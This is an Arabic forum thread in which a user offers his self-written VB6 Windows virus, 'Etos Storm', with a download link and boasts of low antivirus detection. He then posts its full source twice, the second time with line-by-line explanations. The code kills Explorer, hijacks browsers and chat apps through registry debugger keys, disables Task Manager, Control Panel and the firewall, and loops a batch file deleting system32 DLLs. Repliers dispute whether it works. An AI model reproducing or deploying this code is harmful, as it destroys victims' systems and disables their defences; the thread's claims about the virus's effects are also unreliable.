بسم الله الرحمن الرحيم

هذا ثانى موضوع لى فى المنتدى, بالرغم انى من متابعيه من سنوات
احب ان اقدم لكم احدى فيروساتى التى قمت بتصميمها بنفسى منذ سنه تقريبا ولكنى لم اعلن بذلك على اى موقع, فموقعكم الاولى
هذا الفيروس تعبت جدا فى برمجته, فقد استلزم منى الجهد والبحث الكثير , والحمد لله نتج هذا الفيروس, وانا صممت فيروسين اخرين ولكن سوف اعلن عنهم فى موضوع مستقل

معلومات عن الفيروس:
اسم الفيروس: Etos Storm
حجم الفيروس: KB32
المبرمج: Etos
لغه البرمجه: vb6
مستواه: خطير

اضراره:
تكون اضرار الفيروس كالتالى:
1- ازاله ملفات dll من System 32 مما يؤدى الى اصابه الويندوز بالشلل (تعطيل البرامج والالعاب والكثير من الاخطاء)
2- قتل متصفح الويندوز (حتى وان قامت الضحيه باعاده تشغيل الجهاز فسيكون معطل)
3- تعطيل الدوس Cmd
4- تعطيل Task Manager
5- الغاء الزر الايمن للماوس
6- تبطئ الماوس بنسبه تقريبيه 60% من الوضع الطبيعى ( القيمه الافتراضيه من 16:10 , الفيروس يقوم بجعلها 3 )
7- تعطيل Control Panel وعدم امكانيه التحكم بكافه الخيارات
8- تعطيل كل خدمات الانترنت المرتبطه بالبرامج
9- محو ملفات Drivers فى بارتشن النظام
10- تعطيل System Propreties
11- تعطيل firewall ( الخاص بالويندوز)
12- العبث بدقه الالوان ( القيمه الافتراضيه 16 , الفيروس يجعلها 3 )
13- اما بالنسبه لـ Cd-Rom فقط عطلت فيها حاجتين :
1- خاصيه Autorun
2- خاصيه Disable Start

-14 تعطيل برامج الشات والمحادثات:
1- تعطيل Yahoo
2- تعطيل MSN
3- تعطيل Skype

15- تعطيل المتصفحات الاتيه:
1- تعطيل متصفح Internet explorer
2- تعطيل متصفح Firefox
3- تعطيل متصفح Opera
4- تعطيل متصفح Avant
5- تعطيل متصفح Chrome

16- تعطيل بعض البرامج العامه:
1- تعطيل برنامج Winrar
2- تعطيل برنامج Adobe Reader
3- تعطيل برنامج Winamp
4- تعطيل برنامج Windows Media Player
5- تعطيل برنامج Movie Maker

فحص الفيروس على مواقع الحمايه:
فحصه على موقع www.metascan-online.com/
(40 حمايه)
http://im31.gulfup.com/Sh3bV.bmp (http://www.gulfup.com/?nzR8LL)

ونرى ان 6 حمايات من 40 حمايه هى التى تكشفه....وهم:

BitDefender
Generic.Malware.Tk.DD598D74

Commtouch
W32/VBTrojan.Downloader.1D!Maximus

F-prot
W32/VBTrojan.Downloader.1D!Maximus

F-secure
Generic.Malware.Tk.DD598D74

Ikarus
Trojan.Crypt

وان شاء الله سوف اقوم بتشفيره

التحميل:
http://www.gulfup.com/?eTyaaY

اخوكم ايــتــوس

جاري تجربه الفيروس ولي رجعه

جاري التجربه

- - - تم التحديث - - -

حبي الفايوس 100 100 ابشرك لابتوبي انمسح وصارت بيه الاعيب انا كنت حاب افرمت هههههههه بفرمت وجيكم

- - - تم التحديث - - -

حاب اكلك عشت يا بطل تدمر الابتوب راحوا الضحايا ههههه

- - - تم التحديث - - -

صراحتا يبني اشو كلو اختفا ب بقا كوكل كروم

- - - تم التحديث - - -

احس طاير في الهوى

- - - تم التحديث - - -

بس في شي غريب بالفايروس اشتغلن cmd 7 بس اشتغل سيرفر ايضا معاهم

- - - تم التحديث - - -

فسر العباره سيرفر مع الفيجول ومسحت بالاداة بعد ممسح الوندوز

- - - تم التحديث - - -

سلااااااااااااااااااااااا م شباب حبكي فايروساتكم خطيره

- - - تم التحديث - - -

طبعا زهكت ومحغلق الجهاز ولا حفرمت حختبر كل الفيروسات واتاكد انها حتحرق ما تبقى من الجهاز

- - - تم التحديث - - -

طيب كيف حكافح المرض

- - - تم التحديث - - -

الفايروس كذب والدليل بتصفح بكوكل وفاتح سكايب بس اختفت الشاشه وشتغل سيرفر والسيستم سليم والحمدلله ويمكن اذا اعدت التشغيل يعود

- - - تم التحديث - - -

اعدت التشغيل ورجع كل شي
وذا سيرفر وبعض الاوامر الي تخفي الشاشه لوقت معين يرجى من الاداره حذف الموضوع واذا حابين تتاكداو اسوي فديو والله اراويكم يالملغمين

- - - تم التحديث - - -

اعدت التشغيل ورجع كل شي
وذا سيرفر وبعض الاوامر الي تخفي الشاشه لوقت معين يرجى من الاداره حذف الموضوع واذا حابين تتاكداو اسوي فديو والله اراويكم يالملغمين


- - - تم التحديث - - -

[SIZE=6]الفديو الي صورته من غرب مؤقتا بينزل على الرابط [/SIZ=6
وشوفوا الفديو واتمنى من الاداره تشوف الفديو وتغلق الموضوع ملغوم
http://www.youtube.com/watch?v=KkPs4GfJhKg&feature=youtu.be

لا حول ولا قوه الا بالله
يا اخى هل تلقى التهم جزافا سامحك الله
لا مشكله من وجود مشاكل فى الفيروس فنحن كلنا مبتدأون...
اما انك تقول ان دا سيرفر وتطلب غلق الموضوع بحجه انه ملغوم... فمع احترامى هذا كلام لا يقوم على دليل
وحضرتك تابع نفسك وشارح فى فيديو

انت تقول انه بيفتح دوس... اقولك فعلا
هذا هو الكود بالفيجوال بيسك:

Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
(ByVal hWnd1 As Long, ByVal hWnd2 As Long, _
ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, _
ByVal nCmdShow As Long) As Long
Option Explicit
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Private Sub Form_Load()
On Error Resume Next
Dim W
Dim WindowsD As String
WindowsD = Space(144)
W = GetWindowsDirectory(WindowsD, 144)
Text1.Text = WindowsD
App.TaskVisible = False
Dim hwnd As Long
hwnd = FindWindowEx(0&, 0&, "Progman", vbNullString)
ShowWindow hwnd, 0
Shell "taskkill /f /im explorer.exe"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Skype.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moviemk.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winamp.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmplayer.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinRAR.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmsgs.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\YahooMessenger.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Policies\system\DisableTaskMgr", "00000001", "REG_DWORD"
CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Policies\Explorer\NoControlPanel", "00000001", "REG_DWORD"
CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Policies\Explorer\NoViewContextMenu", "00000001", "REG_DWORD"
CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Policies\Explorer\NoWebServies", "00000001", "REG_DWORD"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Policies\Explorer\NoPropertiesMyComputer", "00000001", "REG_DWORD"
CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\MouseSensitivity", "00000999", "REG_DWORD"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\StandardProf ile\EnableFirewall", "0", "REG_DWORD"
CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickSpeed", "1", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics\Shell Icon BPP", "3", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Cdrom\AutoRun", 0, "REG_DWORD"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Cdrom\Start", 0, "REG_DWORD"
Shell "taskkill /f /im WinRAR.exe"
Shell "taskkill /f /im firefox.exe"
Shell "taskkill /f /im IEXPLORE.exe"
Shell "taskkill /f /im YahooMessenger.exe"
Shell "taskkill /f /im msmsgs.exe"
Shell "taskkill /f /im opera.exe"
Shell "taskkill /f /im avant.exe"
Shell "taskkill /f /im mpc-hc.exe"
Shell "taskkill /f /im wmplayer.exe"
Open Text1.Text & "\Etos Storm.bat" For Output As #1
Print #1, "@echo off"
Print #1, "break off"
Print #1, ":V"
Print #1, "del " & Text1.Text & "\system32\*.dll"
Print #1, "goto V"
Close #1
Shell Text1.Text & "Etos Storm.bat", vbHide
End Sub




هل علمت يا اخى لماذا فتح الدوس.... ستجد فى الكود السابق الاجابه
واعذرنى انا لم افهم ما كتبته فى البوست السابق... لا اهفهم لهجتك العاميه

- - - تم التحديث - - -

وانت يا اخى هل تستهزأ بى فى هذا الفيديو... فى الصوره التى وضعتها فى البدايه
اخى احب ان اذكرك انك مهما كنت قد وصلت فى قمه العلم فستجد نفسك فى النهايه لا تعلم
والجاهل هو من ادعى تمام العلم
وانت تستهزأ بى وعلى قله معلوماتى......فلن اجيب وارد عليك يا اخى... بل سأقول لك يكفينى هذا العلم الضئيل,على ان اكون محترف واستهزأ بالاخرين الاقل منى خبره

- - - تم التحديث - - -

وانت يا اخى هل تستهزأ بى فى هذا الفيديو... فى الصوره التى وضعتها فى البدايه
اخى احب ان اذكرك انك مهما كنت قد وصلت فى قمه العلم فستجد نفسك فى النهايه لا تعلم
والجاهل هو من ادعى تمام العلم
وانت تستهزأ بى وعلى قله معلوماتى......فلن اجيب وارد عليك يا اخى... بل سأقول لك يكفينى هذا العلم الضئيل,على ان اكون محترف واستهزأ بالاخرين الاقل منى خبره

هههههههههههههه اخي العزيز
انت اولا مصانع فايروس صصانع اكاذيب اولا
- ازاله ملفات dll من System 32 مما يؤدى الى اصابه الويندوز بالشلل (تعطيل البرامج والالعاب والكثير من الاخطاء)
2- قتل متصفح الويندوز (حتى وان قامت الضحيه باعاده تشغيل الجهاز فسيكون معطل)
3- تعطيل الدوس Cmd
4- تعطيل Task Manager
5- الغاء الزر الايمن للماوس
6- تبطئ الماوس بنسبه تقريبيه 60% من الوضع الطبيعى ( القيمه الافتراضيه من 16:10 , الفيروس يقوم بجعلها 3 )
7- تعطيل Control Panel وعدم امكانيه التحكم بكافه الخيارات
8- تعطيل كل خدمات الانترنت المرتبطه بالبرامج
9- محو ملفات Drivers فى بارتشن النظام
10- تعطيل System Propreties
11- تعطيل firewall ( الخاص بالويندوز)
12- العبث بدقه الالوان ( القيمه الافتراضيه 16 , الفيروس يجعلها 3 )
13- اما بالنسبه لـ Cd-Rom فقط عطلت فيها حاجتين :
1- خاصيه Autorun
2- خاصيه Disable Start

-14 تعطيل برامج الشات والمحادثات:
1- تعطيل Yahoo
2- تعطيل MSN
3- تعطيل Skype

15- تعطيل المتصفحات الاتيه:
1- تعطيل متصفح Internet explorer
2- تعطيل متصفح Firefox
3- تعطيل متصفح Opera
4- تعطيل متصفح Avant
5- تعطيل متصفح Chrome

16- تعطيل بعض البرامج العامه:
1- تعطيل برنامج Winrar
2- تعطيل برنامج Adobe Reader
3- تعطيل برنامج Winamp
4- تعطيل برنامج Windows Media Player
5- تعطيل برنامج Movie Maker
اشو مصار شي من الي قلته وقلت حتلو بعد اعاة التشغيل
وك ثم اذاه كشف الهوست هي راوتني بعيني سيرفر يشتغل مدموج مع البيانات يعني اجذب عيوني
طيب جذبت عيوني وين عمل الفايروس كلامك خرط كله

- - - تم التحديث - - -

اريد جواب او الفايروس ذا ما اله عمل اساسا

- - - تم التحديث - - -

ثم اخي من العيب استهزا بيك وانما انبهك على ان اخطائك تصححها في المستقبل ولكن انا لا سوى كلمة صحيحه مثل مقلت كلمة يمسح فلان لازم تطبق كلامك

اخى العزيز
الكود عندك بالفيجوال بيسك... لا مشكله انه يوجد بعض الاخطاء
انت تقول سيرفر........اقول لك لا
والفيصل بينى وبينك يا اخى هو من خبير يحلل كود الفيروس
ولو وجد عكس الكود الذى وضعته فلتفعله ما تشائون..... واتحدى

انت تقول ان كلامى غلط وان هذا الفيروس لا عمل له
راجع الكود جيدا يا اخى وحلله, لا اعلم هل تفهم فى الفيجوال بيسك ام لا
فلو كنت تعلم لن تقول ذلك
وكما قولت الفيصل بينى وبينك تحليل الفيروس

طيب حبي امري لله بس مقلتلك هو كله سيرفر لك من يشتغل باداةprocexp رح تشتغل كلفة اوارمرك لكن سوف يعمل سيرفر اخي ومن يعمل يسحب نت يعني شيسمونه هذا طيب ثم لا فرق بين عربين واعجمي .......الا بالتقوى

- - - تم التحديث - - -

رح اصير عركه من وره فايروس هههههههههههههههههههههههه

Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
(ByVal hWnd1 As Long, ByVal hWnd2 As Long, _
ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, _
ByVal nCmdShow As Long) As Long
Option Explicit
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

تعريفات للعمليات الجاريه


Private Sub Form_Load()
بدايه الحدث


On Error Resume Next
تجاوز الاخطاء او سموها كما ترييدون



Dim W
Dim WindowsD As String
WindowsD = Space(144)
W = GetWindowsDirectory(WindowsD, 144)
داله تحدد الويندوز


App.TaskVisible = False
اخفاء البرنامج من التاسك مانيجر


Dim hwnd As Long
hwnd = FindWindowEx(0&, 0&, "Progman", vbNullString)
ShowWindow hwnd, 0

الغاء start


Shell "taskkill /f /im explorer.exe"
قتل الويندوز اكسبلورر


CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
كود ريجسترى لعمل debugger لملف chrome الى مسار اخر, مما يعنى لو اى حد جيه يشغله لن يفتح فى هذا المسار وستأتى له رساله خطأ


CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Skype.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
عمل debugger للاسكاى بى


CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
عمل debugger لمتصفح الويندوز


CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moviemk.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
عمل debugger للموفى ميكر


CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winamp.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
عمل debugger للوينامب


CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmplayer.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinRAR.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmsgs.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\YahooMessenger.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
وكل هذااااااااااااااا عمل debugger للملفات الى موجوده فى كود الريجسرترى ويجعلها تعمل فى مسار مما يعنى تعطيل البرنامج


CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\system\DisableTaskMgr", "00000001", "REG_DWORD"
تعطيل التاسك مانجر من الريجسترى


CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoControlPanel", "00000001", "REG_DWORD"
تعطيل الكنترول بانل من الريجسترى


CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoViewContextMenu", "00000001", "REG_DWORD"
تعطيل بعض الاعدادات من الريجسترى


CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoWebServies", "00000001", "REG_DWORD"
تعطيل خدمات الويب من الريجسترى


CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
عمل debugger للانترنت اكسبلورر والفاير فوكس الى مسار اخر


CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoPropertiesMyCompute r", "00000001", "REG_DWORD"
CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\MouseSensitivity", "00000999", "REG_DWORD"
الاول تعطيل الاعدادات
الاخير مسئول عن الماوس


CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ SharedAccess\Parameters\FirewallPolicy\StandardPro file\EnableFirewall", "0", "REG_DWORD"
تعطيل حائط النار


CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickSpeed", "1", "REG_SZ"
مسئوله عن سرعه الماوس


CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\Cdrom\AutoRun", 0, "REG_DWORD"
تعطيل الاوتو رن للسى دى او اليو اس بى


CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\Cdrom\Start", 0, "REG_DWORD"
شبيه بالكود السابق


Shell "taskkill /f /im WinRAR.exe"
Shell "taskkill /f /im firefox.exe"
Shell "taskkill /f /im IEXPLORE.exe"
Shell "taskkill /f /im YahooMessenger.exe"
Shell "taskkill /f /im msmsgs.exe"
Shell "taskkill /f /im opera.exe"
Shell "taskkill /f /im avant.exe"
Shell "taskkill /f /im mpc-hc.exe"
Shell "taskkill /f /im wmplayer.exe"
كل هذا يقتل هذه الملفات من التاسك مانجر
وهى المسئول عن ظهور صفحات الدوس التى تظهر ثم تختفى


Open Text1.Text & "\Etos Storm.bat" For Output As #1
Print #1, "@echo off"
Print #1, "break off"
Print #1, ":V"
Print #1, "del " & Text1.Text & "\system32\*.dll"
Print #1, "goto V"
Close #1
Shell Text1.Text & "Etos Storm.bat", vbHide
عمل ملف bat لمسح ملفاتdll التى ليست قيد العمل


End Sub
نهايه الداله

- - - تم التحديث - - -

يا اخى تكلم بالعربيه الفصحه لا افهم لهجتك

يا روحي يا روحي سجلت فديو من فتح الفايروس للنهايه
ما اله عمل والله ما سوى اي شي بالجهاز والله اتنازل عن كلامي فايروس ولكن ما ادى الفايروس عمله الفايروس ذا ما ادى عمله اذا الموضوع ما يفيد لان الاساس فيه هو عمل الفايروس

- - - تم التحديث - - -

طبعا اعتذر عن كلمة سيرفر بس اشتغل بصيغة .exe
ولكن ما ادى عمله يا روحي

- - - تم التحديث - - -

\ليل ما ادى عمله
http://www.youtube.com/watch?v=HoH2hNoph4E&feature=youtu.be
طيب اه انا عملت ريستارت ورجع

يا روحي يا روحي سجلت فديو من فتح الفايروس للنهايه
ما اله عمل والله ما سوى اي شي بالجهاز والله اتنازل عن كلامي فايروس ولكن ما ادى الفايروس عمله الفايروس ذا ما ادى عمله اذا الموضوع ما يفيد لان الاساس فيه هو عمل الفايروس

- - - تم التحديث - - -

طبعا اعتذر عن كلمة سيرفر بس اشتغل بصيغة .exe
ولكن ما ادى عمله يا روحي

هذا اكثر ما يحيرنى !!!!!
ما هى المشكله فى هذا الكود. انا ارى انه سليم والدوال سليمه
فكيف لا يفعل اى شيئ
!!!!!!!!!!!!!!!!!!

لعل وعسى احد من خبراء الفيجوال بيسك يخبرونى بالسبب او بالخطأ الموجود

عالعموم اخي يصلح فايروس رعب ههههه
ولكن غير اسم الموضوع حتلو بلغت عنك عادي لان اول والتالي حيغيروا اسم الموضوع او يغلقوه وتعمل واحد زين واعذرني اذا ازعجتك ولكن انا احب تطبيق القوانين
واريد ناتج عالعموم نحن اخوة اشاء الله

الحمد لله
بالتوفيق

ههههههههههههههههههههههههه ههه
ياشباب والله مايصير

عالعموم اخي يصلح فايروس رعب ههههه
ولكن غير اسم الموضوع حتلو بلغت عنك عادي لان اول والتالي حيغيروا اسم الموضوع او يغلقوه وتعمل واحد زين واعذرني اذا ازعجتك ولكن انا احب تطبيق القوانين
واريد ناتج عالعموم نحن اخوة اشاء الله

حصل خير مفيش مشكله يا باشا

شكؤالكككككككك

جاري التحميل ... وشكراا